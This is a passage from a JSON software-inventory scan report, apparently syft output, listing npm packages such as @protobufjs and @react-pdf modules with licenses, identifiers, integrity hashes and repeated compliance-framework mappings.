"sha512-mnzgDV26ueAvk7rsbt9L7bE0SuAoqyuys/sMMrmVcN5x9VsxpcG3rqAUSgDyLp0UZlmNfIbQ4fHfCtreVBk8Ew==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "0888dd200a4f8fb9", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @protobufjs/path 1.1.2", "title": "@protobufjs/path 1.1.2", "description": "Package discovered: @protobufjs/path 1.1.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "742d5880151b22a5", "name": "@protobufjs/path", "version": "1.1.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BSD-3-Clause", "spdxExpression": "BSD-3-Clause", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@protobufjs\\/path:\\@protobufjs\\/path:1.1.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40protobufjs/path@1.1.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@protobufjs/path/-/path-1.1.2.tgz", "integrity": "sha512-6JOcJ5Tm08dOHAbdR3GrvP+yUUfkjG5ePsHYczMFLq3ZmMkAD98cDgcT2iA1lJ9NVwFd4tH/iSSoe44YWkltEA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "37fb5baaf891bf3b", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @protobufjs/pool 1.1.0", "title": "@protobufjs/pool 1.1.0", "description": "Package discovered: @protobufjs/pool 1.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "2f9166cf527d1f74", "name": "@protobufjs/pool", "version": "1.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BSD-3-Clause", "spdxExpression": "BSD-3-Clause", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@protobufjs\\/pool:\\@protobufjs\\/pool:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40protobufjs/pool@1.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@protobufjs/pool/-/pool-1.1.0.tgz", "integrity": "sha512-0kELaGSIDBKvcgS4zkjz1PeddatrjYcmMWOlAuAPwAeccUrPHdUqo/J6LiymHHEiJT5NrF1UVwxY14f+fy4WQw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "008b4e7e3539d471", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @protobufjs/utf8 1.1.1", "title": "@protobufjs/utf8 1.1.1", "description": "Package discovered: @protobufjs/utf8 1.1.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "afb917b3027623df", "name": "@protobufjs/utf8", "version": "1.1.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BSD-3-Clause", "spdxExpression": "BSD-3-Clause", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@protobufjs\\/utf8:\\@protobufjs\\/utf8:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40protobufjs/utf8@1.1.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@protobufjs/utf8/-/utf8-1.1.1.tgz", "integrity": "sha512-oOAWABowe8EAbMyWKM0tYDKi8Yaox52D+HWZhAIJqQXbqe0xI/GV7FhLWqlEKreMkfDjshR5FKgi3mnle0h6Eg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b1e07271de6eec7b", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @react-email/render 0.0.16", "title": "@react-email/render 0.0.16", "description": "Package discovered: @react-email/render 0.0.16", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "e1894e7a0de3acac", "name": "@react-email/render", "version": "0.0.16", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@react-email\\/render:\\@react-email\\/render:0.0.16:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react-email\\/render:\\@react_email\\/render:0.0.16:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_email\\/render:\\@react-email\\/render:0.0.16:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_email\\/render:\\@react_email\\/render:0.0.16:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react-email\\/render:0.0.16:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react_email\\/render:0.0.16:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40react-email/render@0.0.16", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@react-email/render/-/render-0.0.16.tgz", "integrity": "sha512-wDaMy27xAq1cJHtSFptp0DTKPuV2GYhloqia95ub/DH9Dea1aWYsbdM918MOc/b/HvVS3w1z8DWzfAk13bGStQ==", "dependencies": { "html-to-text": "9.0.5", "js-beautify": "^1.14.11", "react-promise-suspense": "0.3.4" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "2e3b9f0f7d4d1d7f", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @react-pdf/fns 2.2.1", "title": "@react-pdf/fns 2.2.1", "description": "Package discovered: @react-pdf/fns 2.2.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "38462ff4454997a0", "name": "@react-pdf/fns", "version": "2.2.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@react-pdf\\/fns:\\@react-pdf\\/fns:2.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react-pdf\\/fns:\\@react_pdf\\/fns:2.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/fns:\\@react-pdf\\/fns:2.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/fns:\\@react_pdf\\/fns:2.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/fns:2.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/fns:2.2.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40react-pdf/fns@2.2.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@react-pdf/fns/-/fns-2.2.1.tgz", "integrity": "sha512-s78aDg0vDYaijU5lLOCsUD+qinQbfOvcNeaoX9AiE7+kZzzCo6B/nX+l48cmt9OosJmvZvE9DWR9cLhrhOi2pA==", "dependencies": { "@babel/runtime": "^7.20.13" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "06f3ac6357300fe3", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @react-pdf/fns 3.1.3", "title": "@react-pdf/fns 3.1.3", "description": "Package discovered: @react-pdf/fns 3.1.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "4656650b2a6dd236", "name": "@react-pdf/fns", "version": "3.1.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@react-pdf\\/fns:\\@react-pdf\\/fns:3.1.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react-pdf\\/fns:\\@react_pdf\\/fns:3.1.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/fns:\\@react-pdf\\/fns:3.1.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/fns:\\@react_pdf\\/fns:3.1.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/fns:3.1.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/fns:3.1.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40react-pdf/fns@3.1.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@react-pdf/fns/-/fns-3.1.3.tgz", "integrity": "sha512-0I7pApDr1/RLAKbizuLy/IHTEa93LSPy/bEwYniboC3Xqnp6Od8xFJKbKEzGw2wh/5zKFFwl00g4t9RwgIMc3w==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "0e189b3633f52f28", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @react-pdf/font 2.5.2", "title": "@react-pdf/font 2.5.2", "description": "Package discovered: @react-pdf/font 2.5.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "15064a64821e35da", "name": "@react-pdf/font", "version": "2.5.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@react-pdf\\/font:\\@react-pdf\\/font:2.5.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react-pdf\\/font:\\@react_pdf\\/font:2.5.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/font:\\@react-pdf\\/font:2.5.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/font:\\@react_pdf\\/font:2.5.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/font:2.5.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/font:2.5.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40react-pdf/font@2.5.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@react-pdf/font/-/font-2.5.2.tgz", "integrity": "sha512-Ud0EfZ2FwrbvwAWx8nz+KKLmiqACCH9a/N/xNDOja0e/YgSnqTpuyHegFBgIMKjuBtO5dNvkb4dXkxAhGe/ayw==", "dependencies": { "@babel/runtime": "^7.20.13", "@react-pdf/types": "^2.6.0", "cross-fetch": "^3.1.5", "fontkit": "^2.0.2", "is-url": "^1.2.4" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "325345669fb318b9", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @react-pdf/font 4.0.8", "title": "@react-pdf/font 4.0.8", "description": "Package discovered: @react-pdf/font 4.0.8", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "19aa56c736ba6f4e", "name": "@react-pdf/font", "version": "4.0.8", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@react-pdf\\/font:\\@react-pdf\\/font:4.0.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react-pdf\\/font:\\@react_pdf\\/font:4.0.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/font:\\@react-pdf\\/font:4.0.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/font:\\@react_pdf\\/font:4.0.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/font:4.0.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/font:4.0.8:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40react-pdf/font@4.0.8", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@react-pdf/font/-/font-4.0.8.tgz", "integrity": "sha512-deNd+emtZAJho1IlzKL9bRoLAGv/6oXOIKO2oZfs4RuXUrK1onLHbJO7e2YoVLPFP/sQxisRTnzdJFtd35iKwA==", "dependencies": { "@react-pdf/pdfkit": "^5.1.1", "@react-pdf/types": "^2.11.1", "fontkit": "^2.0.2", "is-url": "^1.2.4" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a9ddc08bb5c72c17", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @react-pdf/image 2.3.6", "title": "@react-pdf/image 2.3.6", "description": "Package discovered: @react-pdf/image 2.3.6", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "e700f7d1572a4159", "name": "@react-pdf/image", "version": "2.3.6", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@react-pdf\\/image:\\@react-pdf\\/image:2.3.6:*:*:*:*:*:*:*", "source": "syft-generated" 